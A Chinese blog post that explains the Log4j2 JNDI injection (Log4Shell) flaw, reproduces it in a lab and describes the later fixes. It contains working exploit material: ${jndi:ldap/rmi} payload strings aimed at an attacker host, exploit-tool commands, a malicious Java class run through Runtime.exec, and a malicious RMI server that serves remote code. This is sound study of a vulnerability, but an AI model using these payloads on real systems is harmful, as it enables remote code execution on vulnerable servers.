Log4j2日志框架JNDI注入漏洞分析与复现

最新推荐文章于 2024-05-29 07:43:29 发布
最新推荐文章于 2024-05-29 07:43:29 发布
阅读量5.1k 收藏 8
点赞数 2
分类专栏: 笔记 文章标签: java 安全 jndi rmi ldap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43509535/article/details/121926917
版权

文章目录

1、漏洞背景

大家在实际开发中,几乎无可避免的需要用到日志框架,不管你是前端后端客户端,他们可以追踪和记录我们的程序运行中的信息,我们可以利用日志很快定位问题,追踪分析。

而对于Java开发人员来说,最常用的日志框架便是Log4j2logback,而本次漏洞的主角便是Apache Log4j2,它有一个特别强大的功能插件Lookups

image-20211214112321219

如果我们试图通过日志去输出一个程序中不存在的对象,而在其他地方,那么我们便可以通过这个插件去通过某些方式去查找目标内容,它只提供一种规范,具体使用哪些方式去查找,就依赖于下层各个实现的模块了

image-20211214112306937

2、JNDI介绍

本次漏洞源自其中的一个叫JNDI的实现,攻击者可以利用JDNI执行远程恶意代码

  • 什么是JNDI?下面看一下百度百科的解释:

JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。目录服务是命名服务的一种自然扩展。两者之间的关键差别是目录服务中对象不但可以有名称还可以有属性(例如,用户有email地址),而命名服务中对象没有属性

这段话的大致含义便是:有一个Key-Value结构的数据源,其中Key是一个名称,Value便是该名称代表的一个Java对象,你可以通过JNDI接口,传一个键值name进去从而获取想要的那个对象。注意百度百科其中说到,它也只是一种标准的命名系统接口,也只是一个上层封装,其并不参与数据源的查找实现,它支持了很多种具体的数据源,详见下图

image-20211214114240492

本文主要示例其中两种数据源实现,一种是LDAP,另一种是RMI

  • LDAP

LDAPLightweight Directory Access Protocol)即轻量级目录访问协议,划重点,它也是一个协议,约定了 ClientServer 之间的信息交互格式、使用的端口号、认证方式等内容。它是一个为查询、浏览和搜索而优化的专业分布式数据库,就像Linux/Unix系统中的文件目录一样。它有优异的读性能,但写性能差,并且没有事务处理、回滚等复杂功能,不适于存储修改频繁的数据,所以目录天生是用来查询的。

  • RMI

RMI(Remote Method Invocation)即远程方法调用,是用JavaJDK1.2中实现的,它大大增强了Java开发分布式应用的能力。其巨大的威力就体现在它强大的开发分布式网络应用的能力上,而RMI就是开发百分之百纯Java的网络分布式应用系统的核心解决方案之一。其实它可以被看作是RPCJava版本。但是传统RPC并不能很好地应用于分布式对象系统。而Java RMI 则支持存储于不同JVM地址空间的程序级对象之间彼此进行通信,实现远程对象之间的无缝远程调用。

3、漏洞原理

假如某一个Java程序中,将浏览器输入的内容记录到了日志中:

@PostMapping("/create")
@ApiOperation(value = "创建Agent", notes = "创建Agent")
public ResultData<Map<Integer, AgentModel>> createAgent(@RequestBody AgentModel agentModel, HttpServletRequest request) {
    log.info(request.getRemoteHost() + "request create agentModel :" + agentModel);
}

网络安全中有一个准则:不要信任用户输入的任何信息

这其中,AgentModel属于外界输入的信息,而不是自己程序里定义出来的。只要是外界输入的,就有可能存在恶意的内容。比如这样:

${jndi:rmi://x.x.x.x:1099/hack}

接下来,Log4j2将会对这行要输出的字符串进行解析。

  • 解析到字符串中有 ${},便会将其中的内容单独处理。

  • 单独解析到,jndi发现是JNDI扩展内容。

  • 便按照JNDI的解析方式再进一步解析

  • 进一步解析发现了是LDAP协议,LDAP服务器在x.x.x.x,要查找的keyhack

  • 调用具体LDAP的模块去请求对应的数据。

这将会去请求一个不会被服务器验证的未知来源的数据,比如一个包含恶意代码的Java对象

Java对象一般只存在于内存中,但也可以通过序列化的方式将其存储到文件中,或者通过网络传输。前面已经提到过了,JNDI支持一个叫命名引用(Naming References)的方式,远程下载一个class文件,然后在本地的程序环境中构建这个对象。

其实这种JNDI 注入的攻击方式存在时间也不短了,在2016年的BlackHat上,@pwntester分享了通过JNDI注入进行RCE利用的方法。这一利用方式在2016年的spring-tx.jar反序列化漏洞和2017FastJson反序列化漏洞利用等多个场景中均有出现。

4、复现

保证JDK版本在1.8u121以下

4.1、使用JNDI 测试服务器

首先我们准备一台JNDI测试服务器虚拟机,用于JNDI注入,生成JNDI链接并启动后端相关服务,这里笔者使用了JNDI-Injection-Exploit

git clone https://github.com/welk1n/JNDI-Injection-Exploit

image-20211213194553721

编译打包

mvn package

运行,指定要执行的命令为打开计算器

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc"

image-20211213194930996

笔者恶意代码运行环境为JDK1.8,只需关注图中框出的两个JNDL连接即可,现在在本地环境随意创建一个空项目,引入Log4j2依赖

<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.14.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.0</version>
</dependency>

添加Log4j2日志配置文件(网上一大堆)

<?xml version="1.0" encoding="UTF-8"?>
<!--
    Configuration后面的status,这个用于设置log4j2自身内部的信息输出,可以不设置,当设置成trace时,你会看到log4j2内部各种详细输出。
-->
<!--
    monitorInterval:Log4j能够自动检测修改配置 文件和重新配置本身,设置间隔秒数。
-->
<configuration status="error" monitorInterval="30">
    <!--先定义所有的appender-->
    <appenders>
        <!--这个输出控制台的配置-->
        <Console name="Console" target="SYSTEM_OUT">
            <!--控制台只输出level及以上级别的信息(onMatch),其他的直接拒绝(onMismatch)-->
            <ThresholdFilter level="trace" onMatch="ACCEPT" onMismatch="DENY"/>
            <!--这个都知道是输出日志的格式-->
            <PatternLayout pattern="%d{HH:mm:ss.SSS} %-5level %class{36} %L %M - %msg%xEx%n"/>
        </Console>
        <!--文件会打印出所有信息,这个log每次运行程序会自动清空,由append属性决定,这个也挺有用的,适合临时测试用-->
        <File name="log" fileName="log/test.log" append="false">
            <PatternLayout pattern="%d{HH:mm:ss.SSS} %-5level %class{36} %L %M - %msg%xEx%n"/>
        </File>
        <!-- 这个会打印出所有的信息,每次大小超过size,则这size大小的日志会自动存入按年份-月份建立的文件夹下面并进行压缩,作为存档-->
        <RollingFile name="RollingFile" fileName="logs/app.log"
                     filePattern="log/$${date:yyyy-MM}/app-%d{MM-dd-yyyy}-%i.log.gz">
            <PatternLayout pattern="%d{yyyy-MM-dd 'at' HH:mm:ss z} %-5level %class{36} %L %M - %msg%xEx%n"/>
            <SizeBasedTriggeringPolicy size="50MB"/>
            <!-- DefaultRolloverStrategy属性如不设置,则默认为最多同一文件夹下7个文件,这里设置了20 -->
            <DefaultRolloverStrategy max="20"/>
        </RollingFile>
    </appenders>
    <!--然后定义logger,只有定义了logger并引入的appender,appender才会生效-->
    <loggers>
        <!--建立一个默认的root的logger-->
        <root level="trace">
            <appender-ref ref="RollingFile"/>
            <appender-ref ref="Console"/>
        </root>
    </loggers>
</configuration>

4.1.1、LDAP

/**
 * @author PengHuanZhi
 * @date 2021年12月13日 17:12
 */
public class HackDemo {

    private static final Logger LOGGER = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME);

    public static void main(String[] args) throws IOException {
        // 避免因为Java版本过高而无法触发此漏洞
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        // 此处ip需要使用本机局域网ip或网络ip,不能使用127.0.0.1
        LOGGER.info("${jndi:ldap://192.168.225.131:1389/l8lfo2}");
    }
}

运行

image-20211213195459622

4.1.2、RMI

/**
 * @author PengHuanZhi
 * @date 2021年12月13日 17:12
 */
public class HackDemo {

    private static final Logger LOGGER = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME);

    public static void main(String[] args) throws IOException {
        // 避免因为Java版本过高而无法触发此漏洞
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        // 此处ip需要使用本机局域网ip或网络ip,不能使用127.0.0.1
        LOGGER.info("${jndi:rmi://192.168.225.131:1099/l8lfo2}");
    }
}

运行

image-20211213195643584

4.2、运行自定义RMI服务器

笔者默认你已经安装了Python环境,创建一个Http服务的文件夹,我这里创建了一个名为PythonServer的文件夹,在文件夹下方编写一个恶意代码:

import java.io.*;
import java.nio.charset.Charset;

/**
 * @author PengHuanZhi
 * @date 2021年12月13日 20:00
 */
public class HackText {
    static {
        System.out.println("I am Log4jRCE from remote!!!");
        String result = runCmd("C:\\", "ping www.baidu.com");
        System.out.println(result);
    }


    public static String runCmd(String cmdpath, String cmd) {
        StringBuilder result = new StringBuilder();
        File dir = new File(cmdpath);
        try {
            Process ps = Runtime.getRuntime().exec(cmd, null, dir);

            BufferedReader br = new BufferedReader(new InputStreamReader(ps.getInputStream(), Charset.forName("GBK")));
            String line;
            while ((line = br.readLine()) != null) {
                System.out.println(line);
                result.append(line).append("\n");
            }

            br.close();
            System.out.println("close ... ");
            ps.waitFor();
            System.out.println("wait over ...");

            return result.toString();
        } catch (IOException | InterruptedException ioe) {
            ioe.printStackTrace();
        }
        System.out.println("child thread donn");
        return "fail";
    }
}

然后使用javac命令将其编译为字节码文件,使用如下命令利用Python开启Http服务

python3 -m http.server 8080

image-20211213212140303

本地环境创建RMI恶意服务端,等待受害者连接

/**
 * @author PengHuanZhi
 * @date 2021年12月13日 19:58
 */
public class RmiServer {
    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        try {
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();
            System.out.println("Create RMI registry on port 1099!");
            // 前两个参数为类名,第三个参数为远程类地址
            Reference reference = new Reference("HackText", "HackText", "http://192.168.225.131:8080/");
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.bind("hack", referenceWrapper);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

模拟受害者服务器执行JNDI注入:

/**
 * @author PengHuanZhi
 * @date 2021年12月13日 17:12
 */
public class HackDemo {

    private static final Logger LOGGER = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME);

    public static void main(String[] args) throws IOException {
        // 避免因为Java版本过高而无法触发此漏洞
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        // 此处ip需要使用本机局域网ip或网络ip,不能使用127.0.0.1
        LOGGER.info("${jndi:rmi://10.5.32.12:1099/hack}");
    }
}

先将恶意RMI服务开启,然后再执行受害者代码:

image-20211214110858318

5、修复

新版的log4j2已经修复了这个问题,下面是log4j2官网中关于JNDI lookup的说明:

image-20211214143200996

修复后的log4j2JNDI lookup中增加了很多的限制:

  • Log4j 2.15.1 开始,JNDI 操作要求需要显式配置 log4j2.enableJndi=true 系统属性或相应的环境变量,才能使用带有JNDI功能的Log4j2,否则将使用不带JNDI功能的Log4j2

  • 在开启了JNDI功能后, 仅支持 javaLDAPLDAPS协议。可以通过在 log4j2.allowedJndiProtocols 属性上指定它们来支持其他协议。

  • 不支持实现 Referenceable 接口的 Java 类。

  • 默认情况下仅支持 Java 原始类以及由 log4j2.allowedLdapClasses 属性指定的任何类。

  • 仅支持对本地主机名或 IP 地址的引用以及 log4j2.allowedLdapHosts 属性中列出的任何主机或 IP 地址。

以上几道限制,算是彻底封锁了通过打印日志去远程加载class的这条路了。

两米以下皆凡人
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Log4j2JNDI注入漏洞原理分析与思考
m0_69745415的博客
05-05 443
因为存在前身Log4j,而且都是Apache下的项目,不管是jar包名称还是package名称,看起来都很相似,导致有些人分不清自己用的是Log4j还是Log4j2。这里给出几个辨别方法: Log4j2分为2个jar包,一个是接口 log4j-api-版本号.jar ,一个是具体实现 log4j−core−{版本号}.jar ,一个是具体实现 log4j-core-版本号.jar ,一个是具体实现 log4j−core−{版本号}.j
JNDI注入-RMI&LDAP服务(详细完整原理篇,小白也能看得懂)
qq_68064663的博客
09-14 1165
使用jndi注入工具:JNDI-Injection-Exploit可以生成远程调用链接ldap://47.94.236.117:1389/nx5qkh,ldap://47.94.236.117:1389/nx5qkh:执行远程地址的一个class文件,功能:调用47.94.236.117的计算器。JNDIjava系统自带的api,用于访问ldaprmi...的api,ldaprmiJNDI内置接口,他们这些接口可以远程调用执行一些文件,文件中可以命令执行,如调用计算器。Injection和。
JNDI-Injection-Exploit
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 3688
JNDI-Injection-Exploit工具比marshalsec要好用的多,相当于把http服务器和协议服务器放在了一起 github地址 https://github.com/welk1n/JNDI-Injection-Exploit.git 可以下载其release下的安装包 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。
JAVA安全之Log4j-Jndi注入原理以及利用方式
qq_53058639的博客
05-29 729
JDNI(Java Naming and Directory Interface)是Java命名和目录接口,它提供了统一的访问命名和目录服务的API。JDNI主要通过JNDI SPI(Service ProviderInterface)规范来实现,该规范定义了对JNDI提供者应实现的接口。在JNDI体系中,JNDI提供者是指实际提供命名和目录服务的软件组件。JNDISPI规范包含了多个接口,其中最为重要的是Context接口。
JNDI-Injection-Exploit项目介绍
gitblog_00055的博客
03-23 342
JNDI-Injection-Exploit项目介绍 项目地址:https://gitcode.com/welk1n/JNDI-Injection-Exploit 简介 JNDI-Injection-Exploit是一款基于Java Naming and Directory Interface(JNDI)的漏洞利用工具,可以用于远程命令执行、文件上传和反序列化攻击等。该项目的代码托管在GitCod...
JNDI-Injection-Exploit工具安装
arissa666的博客
10-17 794
注意需要在.jar的目录写命令,或者java -jar 后面加上目录。配置完成之后就可以看到mvn版本信息了。因为提示mvn错误,解决下报错问题。执行一个本地调用计算机命令。从github上下载安装。
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
log4j2漏洞复现(CVE-2021-44228)
lionwerson的博客
12-29 3489
log4j2漏洞复现(CVE-2021-44228) 漏洞简介: log4j是Apache公司的一款JAVA日志框架,基本上只要是java框架都会用到这个log4j框架,所以上周不管是不是IT圈的都几乎被刷屏了,可见这个洞的危害之大,波及范围之广。所以复现一下。 影响版本: Apache Log4j 2.x >=2.0-beta9 且 < 2.15.0 复现环境1: 1.log4shell-vulnerable-app环境: docker run --name vulnerable-a
LOG4J RCE 漏洞分享与自查.pdf
12-15
LOG4J RCE 漏洞分享与自查 Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 是一个广泛使用的Java日志框架,它为开发者提供了强大的日志记录功能。然而,在2021年12月初,一个严重的安全漏洞(CVE-2021-44228)被公开,这个漏洞被称为"Log4Shell",允许攻击者通过注入恶意的...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
整合rmildap服务器+恶意类,使用方法: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/Calculator.app") -A - the address of your server, maybe an IP address or a domain. (optional , default address is the first network interface address)
jndi-JNDI-Injection-Exploit
12-27
java asm jndi_JNDI-Injection-Exploit,用于log4j2漏洞验证 可执行程序为jar包,在命令行中运行以下命令: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。 (可选项 , 默认命令是mac下打开计算器,即"open /Applications/Calculator.app") -A - 服务器地址,可以是IP地址或者域名。 (可选项 , 默认地址是第一个网卡地址) 注意: 要确保 1099、1389、8180端口可用,不被其他程序占用。 或者你也可以在run.ServerStart类26~28行更改默认端口。 命令会被作为参数传入Runtime.getRuntime().exec(), 所以需要确保命令传入exec()方法可执行。
log4j log4j2 2.15.0漏洞解决
12-10
Log4j2中的JNDIJava Naming and Directory Interface)注入漏洞,源于其对用户输入的日志字符串未进行充分的过滤和转义。攻击者可以通过在日志消息中插入特定格式的字符串,触发JNDI查找,进而执行任意代码,实现...
对Log4j漏洞的学习与分析-思维导图
最新发布
06-09
对Log4j漏洞的学习与分析,主要包含对log4j漏洞的简介,影响范围,以及相关额排查方法等做一个学习记录,另外还有相关的如:LDAPJNDI等内容的学习
java asm jndi_JNDI-Injection-Exploit
weixin_29066121的博客
02-16 1357
介绍最近把自己之前写的JNDI注入工具改了一下push到了github,地址:github,启动后这个工具开启了三个服务,包括RMILDAP以及HTTP服务,然后生成JNDI链接。测试时可以将JNDI链接插入到JNDI注入相关的POC中,如Jackson、Fastjson反序列化漏洞等。三个服务中,RMILDAP基于marshalsec中RMIRefServer、LDAPRefServer类修...
Log4j2JNDI注入漏洞(CVE-2021-44228)
黑白的博客
10-13 5076
好好学习,天天向上。
Log4j2 Jndi 漏洞原理解析、复盘
君一席
12-13 1759
“ 2021-12-10一个值得所有研发纪念的日子。” 一波操作猛如虎,下班到了凌晨2点25。 基础组件的重要性,在此次的Log4j2漏洞上反应的淋漓尽致,各种“核弹级漏洞”、“超高危” 等词汇看的我瑟瑟发抖,那么问题真的有那么严重吗?这个让大家普遍加班搞到凌晨的漏洞,到底是什么问题? 01 — 漏洞解析、复现 Log4j2框架设计非常优秀,各种功能均是以内部插件的方式进行的扩展实现,比如我们经常在Xml中定义的,实际对应的则是如下的AppendersPlugin对象 而我们在Xml Appenders
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit复现Fastjson反序列化漏洞--保姆级!复现过程!
2301_79837041的博客
04-11 2095
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值